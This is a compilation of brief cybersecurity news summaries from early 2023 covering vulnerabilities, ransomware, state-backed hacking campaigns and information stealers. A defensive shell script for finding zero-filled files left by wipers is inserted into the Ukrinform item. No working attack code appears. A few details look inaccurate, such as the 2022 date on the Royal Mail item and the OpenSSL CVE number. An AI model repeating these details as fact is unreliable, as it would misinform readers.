    Citrix Fixes Severe Flaws in Workspace, Virtual Apps and Desktops

    Citrix recently addressed several vulnerabilities in its Virtual Apps and Desktops, and Workspace App products. In total, patches were released for four vulnerabilities, all of which have been rated high in severity. Successful exploitation of the flaws could potentially enable threat actors with local access to the targeted system to elevate their privileges and take complete control over the system.

    Russian Hacker Convicted of $90 Million Hack-To-Trade Charges

    Russian national Vladislav Klyushin was found guilty of participating in a global scheme that involved hacking into U.S. computer networks to steal confidential earnings reports, which helped the criminals net $90,000,000 in illegal profits. Klyushin was extradited to the U.S. in December 2021 to face charges of hacking into the systems of two U.S.-based filing agents that American companies used to file earnings reports through the Securities and Exchange Commission's (SEC) system.

    Experts Warn of Surge in Multipurpose Malware

    Security researchers have warned that a growing number of versatile malware variants are capable of performing multiple malicious actions across the cyber-kill chain. Picus Security compiled its Red Report 2023 by analyzing over 500,000 malware samples last year, identifying their tactics, techniques and procedures (TTPs) and extracting over 5.3 million “actions.”

    RedEyes Hackers Use New Malware to Steal Data From Windows, Phones

    A North Korean hacking group known as APT37, RedEyes, or ScarCruft has deployed new M2RAT malware and uses steganography for intelligence collection. Researchers at the AhnLab Security Emergency Response Center (ASEC) explained that M2RAT uses a shared memory section for command and data exfiltration while leaving few operational traces on the compromised machine.

    New Stealthy ‘Beep’ Malware Focuses Heavily on Evading Detection

    A new stealthy malware named 'Beep' was discovered last week, with many features designed to evade analysis and detection by security software. The malware was discovered by analysts at Minerva after a flurry of samples were uploaded to VirusTotal, an online platform for file scanning and malicious content detection. Although Beep is still in development and missing several key features, it currently allows threat actors to download and execute further payloads on compromised devices remotely.

    Dozens of Vulnerabilities Patched in Intel Products

    Intel recently released patches for dozens of vulnerabilities impacting its products, including a critical flaw that was identified last year. Tracked as CVE-2021-39296, this flaw has been rated a 10 on the CVSS scale and impacts the Integrated Baseboard Management Controller (BMC) and OpenBMC firmware of several Intel platforms. In particular, CVE-2021-39296 affects the netipmid (IPMI lan+) interface and could enable a threat actor to obtain root access to the BMC by bypassing authentication via specially crafted IPMI messages. Also addressed in BMC and OpenBMC firmware are four other vulnerabilities, including a high-severity out-of-bounds read issue that could cause denial of service on the impacted device. Intel says it has fixed these issues in the latest releases of Integrated BMC firmware versions 2.86, 2.09 and 2.78, and OpenBMC firmware versions 0.72, wht-1.01-61, and egs-0.91-179.

    Microsoft February 2023 Patch Tuesday Fixes 3 Exploited Zero-Days, 77 Flaws

    Yesterday was Microsoft's February 2023 Patch Tuesday; the security updates corrected three actively exploited zero-day vulnerabilities and a total of 77 flaws. Nine vulnerabilities were classified as 'Critical' because they could result in remote code execution if leveraged by an attacker. Although some of the vulnerabilities were classified as more severe than others, successful exploitation of those listed could have a diverse range of effects. As reported by the tech giant, the vulnerabilities, if exploited, could result in denial of service, remote code execution, privilege escalation, or a combination of all three.

    SideWinder APT Attacks Regional Targets in New Campaign

    Security researchers have discovered dozens of new regional targets and new cyber-attack tools linked to Indian APT group SideWinder. The suspected state-sponsored group – also known as Rattlesnake, Hardcore Nationalist (HN2) and T-APT4 – comes under the spotlight in a new report from Group-IB, "Old snake, new skin: Analysis of SideWinder APT activity between June and November 2021."

    New ‘MortalKombat’ Ransomware Targets Systems in the U.S.

    Hackers conducting a new financially motivated campaign are using a variant of the Xorist commodity ransomware named 'MortalKombat,' together with the Laplas clipper, in cyberattacks. Both malware infections are used to conduct financial fraud: the ransomware extorts victims for a decryptor, and Laplas steals cryptocurrency by hijacking crypto transactions. Laplas is a cryptocurrency hijacker released last year that monitors the Windows clipboard for crypto addresses and, when one is found, substitutes an address under the attacker's control. As for MortalKombat, Cisco Talos says the new ransomware is based on the Xorist commodity ransomware family, which uses a builder that lets threat actors customize the malware. Xorist has been decryptable for free since 2016.

    Apple Fixes New WebKit Zero-Day Exploited to Hack iPhones, Macs

    Yesterday, Apple released fixes to address a new actively exploited zero-day flaw being used to target impacted iPhones, iPads, and Macs. Tracked as CVE-2023-23529, the vulnerability is related to a WebKit confusion issue that can allow a threat actor to trigger OS crashes and obtain code execution on compromised devices.

    Cloudflare Blocks Record-Breaking 71 Million RPS DDoS Attack

    This weekend, Cloudflare blocked what it describes as the largest volumetric distributed denial-of-service (DDoS) attack to date. The company said it detected and mitigated not just one but a wave of dozens of hyper-volumetric DDoS attacks targeting its customers over the weekend. The majority of attacks peaked in the ballpark of 50-70 million requests per second (rps), with the largest exceeding 71 million rps. This is the largest reported HTTP DDoS attack on record, more than 35% higher than the previously reported record of 46M rps in June 2022. The attacks were launched using over 30,000 IP addresses from multiple cloud providers against various targets, including gaming providers, cloud computing platforms, cryptocurrency firms, and hosting providers.

    Lazarus Hackers Use New Mixer to Hide $100 Million in Stolen Crypto

    The Lazarus Group has laundered $100 million in stolen Bitcoin through a crypto-mixing service dubbed Sinbad. Sinbad is a custodial mixer, meaning that all cryptocurrency that goes into the service is under the control of the operator, so owners must have sufficient confidence in the operator to give up control of their funds.

    FTC: $1.3 Billion Lost by 70,000 Americans to Romance Scams Last Year

    The U.S. Federal Trade Commission (FTC) says Americans once again reported record losses of $1.3 billion to romance scams in 2022, with median losses of $4,400. According to earlier data from the FTC's Consumer Sentinel Network (Sentinel), Americans also reported losing $493 million in 2019, $730 million in 2020, and $1.3 billion throughout 2021.

    City of Oakland Systems Offline After Ransomware Attack

    The City of Oakland was hit by a ransomware attack on Wednesday night. The ransomware group responsible for the attack is currently unknown. As a consequence of the incident, the City of Oakland was forced to shut down its systems. The attack has not affected the city's core services, and all emergency services are working as expected. The City's Information Technology Department is collaborating with law enforcement to investigate the attack and restore the affected services. The city stated that it is organizing a response plan to address the issue, and that the public should expect delays from the City of Oakland in the meantime.

    NameCheap's Email Hacked to Send Metamask, DHL Phishing Emails

    Domain registrar Namecheap had their email account breached Sunday night, causing a flood of MetaMask and DHL phishing emails that attempted to steal recipients' personal information and cryptocurrency wallets. The phishing campaigns started around 4:30 PM ET and originated from SendGrid, an email platform used historically by Namecheap to send renewal notices and marketing emails. After recipients began complaining on Twitter, Namecheap CEO Richard Kirkendall confirmed that the account was compromised and that they disabled email through SendGrid while they investigated the issue. Kirkendall also said that they believe the breach may be related to a December CloudSek report on the API keys of Mailgun, MailChimp, and SendGrid being exposed in mobile apps.

    Chinese Tonto Team Hackers' Second Attempt to Target Cybersecurity Firm Group-IB Fails

    According to a new blog post published by Group-IB, the cybersecurity firm has been the target of several attacks carried out by the Tonto team, an advanced persistent threat group suspected to be of Chinese origin. Tonto Team, also known as Bronze Huntley, Cactus Pete, Earth Akhlut, Karma Panda, and UAC-0018, has been around since 2009. The group is known for targeting military, diplomatic, and infrastructure entities in Asia and Eastern Europe.

    Devs targeted by W4SP Stealer malware in malicious PyPi packages

    Five malicious packages were found on the Python Package Index (PyPI), stealing passwords, Discord authentication cookies, and cryptocurrency wallets from unsuspecting developers. PyPI is a software repository for packages created in the Python programming language. As the index hosts 200,000 packages, it allows developers to find existing packages that satisfy various project requirements, saving time and effort. Between January 27 and January 29, 2023, a threat actor uploaded five malicious packages containing the 'W4SP Stealer' information-stealing malware to PyPI. While the packages have since been removed, they had already been downloaded by hundreds of software developers.

    Pro-Russia Hacker Group Killnet Targets NATO Websites with DDoS Attacks

    Pro-Russia hacker group Killnet launched a Distributed Denial of Service (DDoS) attack on NATO sites, including the NATO Special Operations Headquarters (NSHQ) website. The attack was confirmed by NATO, while the hacker group announced the attack on its Telegram channel. NATO said in a statement, "NATO cyber experts are actively addressing an incident affecting some NATO websites. NATO deals with cyber incidents on a regular basis, and takes cyber security very seriously."

    Hacker Develops New ‘Screenshotter’ Malware to Find High-Value Targets

    A new threat actor is targeting the United States and Germany with new malware that has the capability to perform surveillance and data theft on compromised systems. The threat actor is tracked as TA866. Researchers at Proofpoint observed activity by TA866 in October 2022, and TA866 is still active in 2023. The actor lures victims using phishing emails, which "include Microsoft Publisher (.pub) attachments with malicious macros, URLs linking to .pub files with macros, or PDFs containing URLs that download dangerous JavaScript files."

    North Korean Hackers Targeting Healthcare with Ransomware to Fund its Operations

    According to a joint advisory released yesterday by US and South Korean cybersecurity and intelligence agencies, North Korean state-backed actors are conducting ransomware attacks against healthcare and critical infrastructure facilities to fund their illicit activities. The actors demand cryptocurrency payments in exchange for restoring access to encrypted files. The funds received from victims are in turn used to support North Korea's national-level priorities and objectives, including targeting the United States and South Korean governments, such as the Department of Defense Information Networks and Defense Industrial Base member networks. To raise awareness and help organizations defend against similar ransomware attacks, the joint advisory includes common TTPs used by Democratic People's Republic of Korea (DPRK) state-sponsored actors as well as relevant indicators of compromise.

    Hackers Breach Reddit to Steal Source Code and Internal Data

    Reddit suffered a cyberattack Sunday evening, allowing hackers to access internal business systems and steal internal documents and source code. According to an alert by the company, threat actors used a phishing lure targeting Reddit employees with a landing page impersonating its intranet website. The site was then used to steal employees' credentials and two-factor authentication tokens.

    Ciena Blue Planet SAML Vulnerabilities

    A privilege escalation vulnerability has been identified in the SAML implementation in Blue Planet products. The vulnerability applies only if SAML access is enabled on your Blue Planet application; if you do not use SAML to access Blue Planet applications, you are not exposed. Where SAML is used for authentication, the vulnerability could be exploited only by someone who already has access to the Blue Planet application.

    Hackers Use Fake Crypto Job Offers to Push Info-Stealing Malware

    A campaign operated by Russian threat actors uses fake job offers to target Eastern Europeans working in the cryptocurrency industry, aiming to infect them with a modified version of the Stealerium malware named 'Enigma.' According to Trend Micro, which has been tracking the malicious activity, the threat actors use a set of heavily obfuscated loaders that exploit an old Intel driver flaw to reduce the token integrity of Microsoft Defender and bypass protections. The attacks start with an email pretending to be a job offer, using fake cryptocurrency interviews to lure their targets. The emails have a RAR archive attachment which contains a TXT ("interview questions.txt") and an executable ("interview conditions.word.exe").

    Tor and I2P Networks Hit by Wave of Ongoing DDoS Attacks

    A wave of denial-of-service attacks has targeted the Tor Network since July 2022. Since then, users have been experiencing connectivity and performance issues. Some users report being unable to load pages or access onion services. The Tor Network team is adjusting network defenses to address the ongoing matter. The Tor Network is adding two new members to focus on .onion services. Furthermore, Tor Project's executive director Isabela Dias Fernandez has stated that the Network's team is choosing to limit public information on the nature of the attacks for now and clarified that their services have not been down, just slow; and that user experiences vary from person to person.

    VMware Finds No Evidence of 0-Day in Ongoing ESXiArgs Ransomware Spree

    VMware on Monday said it found no evidence that threat actors are leveraging an unknown security flaw, i.e., a zero-day, in its software as part of an ongoing ransomware attack spree worldwide. "Most reports state that End of General Support (EoGS) and/or significantly out-of-date products are being targeted with known vulnerabilities which were previously addressed and disclosed in VMware Security Advisories (VMSAs)," the virtualization services provider said. The company further recommends that users upgrade to the latest available supported releases of vSphere components to mitigate known issues, and disable the OpenSLP service in ESXi.

    Clop Ransomware Flaw Allowed Linux Victims to Recover Files for Months

    Clop ransomware has come out with a new variant specially designed to target Linux Servers. The new variant was spotted in the wild in December 2022 by security researcher Antonis Terefos at SentinelLabs after it was used to target a university in Colombia. Although the new strain is very similar to its Windows counterpart (e.g. same encryption method and almost identical process logic), the Linux variant seems to be in the early stages of development and lacks features, including proper obfuscation and evasiveness mechanisms, making it possible for victims to retrieve their files without paying any ransom demands.

    OpenSSL Fixes Multiple New Security Flaws with Latest Update

    OpenSSL recently fixed several security flaws in its open-source cryptographic library, including one type confusion bug rated high severity and seven other vulnerabilities rated medium severity. The type confusion bug is being tracked as CVE-2023-0236 and can allow attackers to read memory contents or cause a denial of service. "The vulnerability is rooted in the way the popular cryptographic library handles X.509 certificates, and is likely to impact only those applications that have a custom implementation for retrieving a certificate revocation list (CRL) over a network."

    U.S. and U.K. Sanction TrickBot and Conti Ransomware Operation Members

    The United States and the United Kingdom have sanctioned seven Russian individuals for their involvement in the TrickBot cybercrime group, whose malware was used to support attacks by the Conti and Ryuk ransomware operations. The sanctions come after a massive trove of internal conversations and personal information was leaked from Conti and TrickBot members in what were called the ContiLeaks and TrickLeaks. While the ContiLeaks focused more on leaking internal conversations and source code, the TrickLeaks went one step further, with the identities, online accounts, and personal information of TrickBot members publicly leaked on Twitter. These data breaches ultimately led to the Conti gang shutting down their operation and their members starting new ransomware operations or joining existing ones.

    US NIST Unveils Winning Encryption Algorithm for IoT Data Protection

    The National Institute of Standards and Technology (NIST) announced that ASCON is the winning bid for the "lightweight cryptography" program to find the best algorithm to protect small IoT (Internet of Things) devices with limited hardware resources. Small IoT devices are those often found in wearable technologies, smart home applications, and more. Due to their size, they have limited hardware resources to handle robust encryption standards. While the devices may lack hardware, they are often used to store and handle sensitive personal information such as health and financial details. NIST was looking to implement a standard for encrypting data on these devices, which have very little computational power.

    New ESXiArgs Ransomware Version Prevents VMware ESXi Recovery

    Unfortunately, a second ESXiArgs ransomware wave started today and includes a modified encryption routine that encrypts far more data in large files. BleepingComputer first learned of the second wave after an admin posted in the ESXiArgs support topic stating that their server was encrypted and could not be recovered using the methods that had worked previously. Preliminary reports indicated that the devices were breached using old VMware SLP vulnerabilities. However, some victims have stated that SLP was disabled on their devices and that they were still breached and encrypted.

    New QakNote Attacks Push QBot Malware via Microsoft OneNote Files

    A new Qbot malware campaign has emerged. "Qbot (aka QakBot) is a former banking trojan that evolved into malware that specializes in gaining initial access to devices, enabling threat actors to load additional malware on the compromised machines and perform data-stealing, ransomware, or other activities across an entire network."

    Chrome 110 Patches 15 Vulnerabilities

    On February 7, Google announced the promotion of Chrome 110 to the stable channel for Windows, Mac, and Linux, addressing a total of 15 security flaws, 10 of which were uncovered and reported by external researchers. Three of the vulnerabilities have been rated high in severity and relate to a type confusion flaw in the V8 engine (CVE-2023-0696), an inappropriate implementation issue in full screen mode (CVE-2023-0697), and an out-of-bounds read vulnerability in WebRTC (CVE-2023-0698). CVE-2023-0696 can allow a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE-2023-0697 could enable a remote attacker to use a crafted HTML page to spoof the contents of the security UI, while the third vulnerability (CVE-2023-0698) can be exploited to perform an out-of-bounds memory read.

    Russian Hackers Using New Graphiron Information Stealer in Ukraine

    The Russian hacking group known as 'Nodaria' (UAC-0056) is using a new information-stealing malware called 'Graphiron' to steal data from Ukrainian organizations. The Go-based malware can harvest a wide range of information, including account credentials, system data, and app data. The malware will also capture screenshots and exfiltrate files from compromised machines. Symantec's threat research team discovered that Nodaria has been using Graphiron in attacks since at least October 2022 through mid-January 2023.

    CISA Releases Recovery Script for ESXiArgs Ransomware Victims

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released a script to recover VMware ESXi servers encrypted by the recent widespread ESXiArgs ransomware attacks. Starting last Friday, exposed VMware ESXi servers were targeted in a widespread ESXiArgs ransomware attack. Since then, the attacks encrypted 2,800 servers according to a list of bitcoin addresses collected by CISA technical advisor Jack Cable. While many devices were encrypted, the campaign was largely unsuccessful as the threat actors failed to encrypt flat files, where the data for virtual disks are stored.

    BEC Attacks Surge 81% in 2022

    Recorded business email compromise (BEC) attacks increased by more than 81% during 2022 and by 175% over the past two years, with open rates on malicious emails also surging, according to Abnormal Security. The security vendor analyzed data from its customers to help compile its H1 2023 threat report, Read Alert.

    Anonymous Leaked 128GB of Data Stolen From Russian ISP Convex Revealing FSB’s Warrantless Surveillance

    The massive trove of data was leaked by an affiliate of the Anonymous group called Caxxii. The stolen documents contain evidence of a dragnet surveillance activity conducted by the Federal Security Service (FSB), headquartered in Moscow. The Russian government is said to monitor its citizens and private organizations across the country illegally. A Russian-based organization known as ‘Convex’ launched a project code-named ‘Green Atom’ whose overall goal was to spy on Russian citizens through unauthorized wiretapping, espionage, and warrantless surveillance of citizens.

    LockBit Ransomware Gang Claims Royal Mail Cyberattack

    The notorious ransomware gang LockBit has claimed another victim. On February 6, 2022, the threat actors published Royal Mail to their data leak site. The attack has led the UK-based mail delivery service to halt international shipping services due to a severe service disruption. This comes after LockBitSupport, the ransomware gang's public-facing representative, previously told BleepingComputer that the LockBit cybercrime group did not attack Royal Mail. Instead, they blamed the attack on other threat actors using the LockBit 3.0 ransomware builder that was leaked on Twitter in September 2022.

    Hackers Backdoor Windows Devices in Sliver and BYOVD Attacks

    A new hacking campaign exploits Sunlogin flaws to deploy the Sliver post-exploitation toolkit and launch Windows Bring Your Own Vulnerable Driver (BYOVD) attacks to disable security software. Sliver is a post-exploitation toolkit created by Bishop Fox that threat actors began using as a Cobalt Strike alternative last summer, employing it for network surveillance, command execution, reflective DLL loading, session spawning, process manipulation, and more.

    Attorney General Forces Spyware Vendor to Alert Victims

    The New York attorney general's office has announced a $410,000 fine for a stalkerware developer who used 16 companies to promote surveillance tools illegally. Patrick Hinchy, the spyware vendor, also agreed to alert his customers' victims that their phones are being secretly monitored using one of his multiple apps, including Auto Forward, Easy Spy, DDI Utilities, Highster Mobile, PhoneSpector, Surepoint, or TurboSpy.

    New Credential-Stealing Campaign By APT34 Targets Middle East Firms

    A malicious campaign targeting organizations in the Middle East with a new backdoor malware has been spotted by security researchers. Describing the activity in a Thursday advisory, Trend Micro researchers Mohamed Fahmy, Sherif Magdy and Mahmoud Zohdy have attributed it to the advanced persistent threat (APT) group the company refers to as APT34.

    Linux version of Royal Ransomware targets VMware ESXi servers

    Royal Ransomware group has come out with a new variant designed to encrypt Linux devices, specifically targeting VMware ESXi virtual machines. According to security researcher Will Thomas, who uncovered the new strain, Royal’s encryptor now supports multiple flags giving operators control over the encryption process:

    • stopvm - stops all running VMs so they can be encrypted
    • vmonly - only encrypt virtual machines
    • fork - unknown
    • logs - unknown
    • id - must be 32 characters

    VM files encrypted with the new variant are appended with the “.royal_u” extension. As of writing, less than 50% of malware scanning engines on VirusTotal are capable of detecting the strain.

    New Russian ‘Passion’ DDoS-As-A-Service Platform Used in Recent Attacks

    A new DDoS-as-a-Service (DDoSaaS) platform named 'Passion' was seen used in recent attacks by pro-Russian hacktivists against medical institutions in the United States and Europe. DDoSaaS platforms rent their available firepower to those looking to launch disruptive attacks on their targets, absolving them from the need to build their own large botnets or coordinate volunteer action. Typically, these botnets are built by compromising vulnerable IoT devices such as routers and IP cameras, uniting them under a large swarm that generates malicious requests toward a particular target. Radware discovered the Passion platform, and although its origins are unknown, the operation has distinctive ties with Russian hacking groups, such as Killnet, MIRAI, Venom, and Anonymous Russia. "The Passion Botnet was leveraged during the attacks on January 27th, targeting medical institutions in the USA, Portugal, Spain, Germany, Poland, Finland, Norway, Netherlands, and the United Kingdom as retaliation for sending tanks in support of Ukraine," said Radware researchers.

    New Nevada Ransomware Targets Windows and VMware ESXi Systems

    A new ransomware operation known as Nevada was discovered. Researchers have observed the variant's evolving capabilities, such as targeting Windows and VMware ESXi systems. Nevada ransomware started to be promoted on the RAMP darknet forums on December 10, 2022, inviting Russian- and Chinese-speaking cybercriminals to join it for an 85% cut of paid ransoms. For those affiliates who bring in a lot of victims, Nevada says it will increase their revenue share to 90%. RAMP has been previously reported as a space where Russian and Chinese hackers promote their cybercrime operations or communicate with peers.

    LockBit ransomware goes 'Green,' uses new Conti-based encryptor

    The LockBit ransomware gang has again started using encryptors based on other operations, this time switching to one based on the leaked source code for the Conti ransomware. Since its launch, the LockBit operation has gone through numerous iterations of its encryptor, starting with a custom one and moving to LockBit 3.0 (aka LockBit Black), which is derived from the BlackMatter gang's source code. This week, cybersecurity collective VX-Underground first reported that the ransomware gang is now using a new encryptor named 'LockBit Green,' based on the leaked source code of the now-disbanded Conti gang.

    Experts Warn of 'Ice Breaker' Cyberattacks Targeting Gaming and Gambling Industry

    A new attack campaign has been targeting the gaming and gambling sectors since at least September 2022, just as the ICE London 2023 gaming industry trade fair event is scheduled to kick off next week. Israeli cybersecurity company Security Joes is tracking the activity cluster under the name Ice Breaker, stating the intrusions employ clever social engineering tactics to deploy a JavaScript backdoor. The attack sequence proceeds as follows: The threat actor poses as a customer while initiating a conversation with a support agent of a gaming company under the pretext of having account registration issues. The adversary then urges the individual on the other end to open a screenshot image hosted on Dropbox.

    No Pineapple Hacking Campaign Reveals North Korean Toolkit

    Cybersecurity firm WithSecure says it detected a campaign targeting the medical research and energy sectors that came to its attention after endpoint detection scans showed a Cobalt Strike beacon on a customer's servers connecting to known threat actor IP addresses. Researchers from the Finnish company dub the campaign "No Pineapple," taking the lead of a fruit-loving software developer of a remote access Trojan called acres.exe deployed by the hackers. The tool truncates data exfiltration messages greater than 1,024 bytes with the message "No Pineapple!"

    Ransomware Attack on ION Group Impacts Derivatives Trading Market

    The LockBit ransomware gang has claimed responsibility for the cyberattack on ION Group, a UK-based software company whose products are used by financial institutions, banks, and corporations for trading, investment management, and market analytics. Back on January 31, 2023, the firm released a statement saying a cyber incident had impacted ION Cleared Derivatives, a division of ION Markets. “The incident is contained to a specific environment, all the affected servers are disconnected, and remediation of services is ongoing. Further updates will be posted when available” - ION Group.

    New Report Reveals NikoWiper Malware That Targeted Ukraine Energy Sector

    ESET uncovered yet another wiper malware strain, dubbed NikoWiper, used by the Russia-affiliated Sandworm group to attack an energy sector company in Ukraine in October 2022. Not much is known about NikoWiper besides the fact that it is based on SDelete, a command line utility from Microsoft that is used for securely deleting files. According to researchers, the attack on the company took place around the same time as Russian armed forces targeted Ukrainian energy infrastructure with missile strikes.

    New Sh1mmer Chromebook Exploit Unenrolls Managed Devices

    Researchers have discovered a new exploit dubbed Sh1mmer. The exploit allows users to unenroll an enterprise-managed Chromebook, bypassing the device restrictions that enrollment enforces. "The exploit requires a publicly leaked RMA shim that the Sh1mmer exploit will modify to allow users to manage the device's enrollment. The researchers say that the following Chromebook boards are known to have publicly released RMA shims: brask, brya, clapper, coral, dedede, enguarde, glimmer, grunt, hana, hatch, jacuzzi, kukui, nami, octopus, orco, pyro, reks, sentry, stout, strongbad, tidus, ultima, volteer, zork. For those unfamiliar with RMA shims, they are disk images stored on USB devices that contain a combination of the ChromeOS factory bundle components used to reinstall the operating system and manufacturer tools used to perform repair and diagnostics."

    Microsoft Stops Selling Windows 10 Licenses a Day Early

    Marking an end to an era, Microsoft is no longer directly selling Windows 10 product keys on their website, instead redirecting users to Windows 11 product pages. This month, Microsoft began displaying an alert on their Windows 10 Home and Pro product pages, warning customers that January 31st would be the last day to purchase a license.

    Microsoft: Over 100 Threat Actors Deploy Ransomware in Attacks

    Microsoft revealed today that its security teams are tracking over 100 threat actors deploying ransomware during attacks. In all, the company says it monitors over 50 unique ransomware families that were actively used until the end of last year. "Some of the most prominent ransomware payloads in recent campaigns include Lockbit Black, BlackCat (aka ALPHV), Play, Vice Society, Black Basta, & Royal," Microsoft said.

    QNAP Fixes Critical Bug Letting Hackers Inject Malicious Code

    QNAP recently released firmware updates to address a critical security vulnerability that could enable remote attackers to inject malicious code on QNAP NAS devices. Tracked as CVE-2022-27596, the flaw impacts QTS 5.0.1 and QuTS hero h5.0.1 versions of the operating system. According to the networking hardware company, the bug is related to a SQL injection flaw that could be exploited by threat actors to send specially crafted requests on vulnerable devices and modify legitimate SQL queries. QNAP says this flaw can be exploited in low-complexity attacks and does not require user interaction or privileges on the targeted devices.

    Porsche Halts NFT Launch, Phishing Sites Fill the Void

    Porsche, the German automobile manufacturer specializing in high-performance vehicles, halted their anticipated NFT launch. The vehicle manufacturer produced its first NFT mint on January 23, 2023. The NFT was a digital replica of one of their renowned 911 cars, with an ETH value of around $1,500. Additionally, Porsche promised their NFT community 7,500 NFTs in their new collection.

    Exploit Released for Critical VMware VRealize RCE Vulnerability

    The IT-ISAC operations team informed the membership of an ongoing bug in VMWare products. Fortunately, the company quickly acknowledged and released patches to address four security vulnerabilities in its vRealize log analysis tool last week. Two of these were rated critical in terms of severity using the CVSS scale, as successful exploitation could allow attackers to execute code remotely on compromised devices.

    Attackers Used Malicious “verified” OAuth Apps to Infiltrate Organizations’ O365 Email Accounts

    “Malicious third-party OAuth apps with an evident ‘Publisher identity verified’ badge have been used by unknown attackers to target organizations in the UK and Ireland, Microsoft has shared. The attacks were first spotted by Proofpoint researchers in early December 2022, and involved three rogue apps impersonating SSO and online meeting apps. Targets in these organizations who have fallen for the trick effectively allowed these rogue apps access to their O365 email accounts and infiltrate organizations’ cloud environments” (Help Net Security, 2023). “The potential impact to organizations includes compromised user accounts, data exfiltration, brand abuse of impersonated organizations, business email compromise (BEC) fraud, and mailbox abuse,” Proofpoint researchers explained.

    Shady Reward Apps on Google Play Amass 20 Million Downloads

    Recently, in the Android app store, there has been an uptick in downloads of activity-tracking applications. The applications advertise themselves as health-tracking apps such as pedometers, good-habit building apps, and health apps. These apps incentivize users to reach their goals on the app by promising users rewards. "According to a report by the Dr. Web antivirus, though, the rewards may be impossible to cash out or are only made available partially after forcing users to watch a large number of advertisements." Examples and their download counts:

    • Lucky Step – Walking Tracker – 10 million downloads
    • WalkingJoy – 5 million downloads
    • Lucky Habit: health tracker – 5 million downloads

    Ukraine: Sandworm Hackers Hit News Agency With 5 Data Wipers

    In a recent announcement from the Ukrainian Computer Emergency Response Team (CERT-UA), the agency stated that 5 different wiper malware strains were deployed on the network of Ukraine’s national news agency (Ukrinform) on January 17th. According to CERT-UA, “5 samples of malicious programs (scripts) were detected, the functionality of which is aimed at violating the integrity and availability of information (writing files/disks with zero bytes/arbitrary data and their subsequent deletion).” The list of wipers deployed includes:

    • CaddyWiper (Windows)
    • ZeroWipe (Windows)
    • SDelete (Windows)
    • AwfulShred (Linux)
    • BidSwipe (FreeBSD)

    The threat actors allegedly deployed the wiper strains by creating a Windows group policy, suggesting that they had breached the news agency’s network beforehand. CERT-UA says that the actors gained remote access to Ukrinform’s network on December 7th, waiting a month to deploy the destructive malware. The attack was a partial success, with the wipers only managing to destroy files on a limited number of data storage systems. As such, Ukrinform was able to continue its operations without any issues.
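
    The overwrite-then-delete behaviour CERT-UA describes leaves zero-filled files behind wherever the deletion step did not complete, and those files are a quick triage signal when scoping which storage systems were hit. As an added example, not from CERT-UA or the original report, the following shell script walks a directory tree and lists every non-empty regular file that consists only of NUL bytes; the sample tree it builds is constructed for the demonstration, and the function names are assumptions.

```shell
#!/bin/sh
# Added example (not from CERT-UA or the page): post-incident triage for the
# overwrite-with-zero-bytes behaviour described above. Lists regular files that are
# non-empty and contain nothing but 0x00 bytes, i.e. files a wiper filled but did not
# delete. Sample files are constructed in a temporary directory for the demonstration.

# Returns 0 when the file at $1 is non-empty and every byte is 0x00.
is_zero_filled() {
    f=$1
    [ -s "$f" ] || return 1        # an empty file is not evidence of wiping
    # Delete NUL bytes; if even one byte survives, the file still holds real content.
    remaining=$(tr -d '\000' < "$f" | head -c 1 | wc -c | tr -d ' ')
    [ "$remaining" -eq 0 ]
}

# Prints the path of every zero-filled regular file under $1, one per line.
find_zero_filled() {
    find "$1" -type f | while IFS= read -r f; do
        if is_zero_filled "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Counts the zero-filled files under $1 (a single number for an incident report).
count_zero_filled() {
    find_zero_filled "$1" | wc -l | tr -d ' '
}

# Constructed demonstration tree: two intact files, two wiped files, one empty file.
demo_zero_scan() {
    root=$(mktemp -d)
    mkdir -p "$root/docs" "$root/db"
    printf 'quarterly report\n' > "$root/docs/report.txt"     # intact
    printf 'id,name\n1,alice\n' > "$root/db/users.csv"          # intact
    head -c 4096 /dev/zero > "$root/docs/budget.xlsx"          # wiped: 4 KiB of NULs
    head -c 64 /dev/zero > "$root/db/index.dat"                # wiped: 64 NULs
    : > "$root/docs/empty.log"                                  # genuinely empty, not wiped
    echo "zero-filled files under $root:"
    find_zero_filled "$root"
    echo "count: $(count_zero_filled "$root")"
    rm -r "$root"
}

demo_zero_scan
```

    Run `find_zero_filled` against a mounted copy of the affected volume rather than the live system, and treat the list as a starting point: a wiper that writes arbitrary data instead of zeros will not show up here and needs a content-based check (for example, a hash comparison against backups) instead.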

    Titan Stealer: A New Golang-Based Information Stealer Malware Emerges

    Researchers at Uptycs uncovered a new Golang-based information stealer malware dubbed Titan Stealer which is being advertised by threat actors on Telegram. Titan Stealer is being advertised as a builder, enabling buyers to customize the malware binary to include specific functionalities and the kind of data to be exfiltrated from the victim’s system. According to researchers, Titan Stealer is capable of stealing credentials from browsers and crypto wallets, FTP client details, screenshots, system information, grabbed files, and much more. Browsers targeted by the info stealer include Google Chrome, Mozilla Firefox, Microsoft Edge, Yandex, Opera, Brave, Vivaldi, 7 Star Browser, Iridium Browser, and others. Titan also targets crypto wallets like Armory, Bytecoin, Coinomi, Edge Wallet, Ethereum, Exodus, Guarda, Jaxx Liberty, and Zcash.

    Massive Microsoft 365 Outage Caused by WAN Router IP Change

    Microsoft says this week's five-hour-long Microsoft 365 worldwide outage was caused by a router IP address change that led to packet forwarding issues between all other routers in its Wide Area Network (WAN). Redmond said that the outage resulted from DNS and WAN networking configuration issues caused by a WAN update and that users across all regions serviced by the impacted infrastructure were having problems accessing the affected Microsoft 365 services. The issue led to service impact in waves, peaking approximately every 30 minutes as shared on the Microsoft Azure service status page (this status page was also affected, as it intermittently displayed "504 Gateway Time-out" errors).

    Researchers to Release VMware vRealize Log RCE Exploit, Patch Now

    Security researchers with Horizon3's Attack Team will release an exploit targeting a vulnerability chain next week for gaining remote code execution on unpatched VMware vRealize Log Insight appliances. Now known as VMware Aria Operations for Logs, vRealize Log Insight makes it easier for VMware admins to analyze and manage terabytes of infrastructure and application logs.

    New Mimic Ransomware Abuses ‘Everything’ Windows Search Tool

    Security researchers discovered a new ransomware strain they named Mimic that leverages the APIs of the 'Everything' file search tool for Windows to look for files targeted for encryption. Discovered in June 2022 by researchers at cybersecurity company Trend Micro, the malware appears to target mainly English and Russian-speaking users. Some of the code in Mimic shares similarities with Conti ransomware, the source of which was leaked in March 2022 by a Ukrainian researcher.

    Bitwarden Password Vaults Targeted in Google Ads Phishing Attack

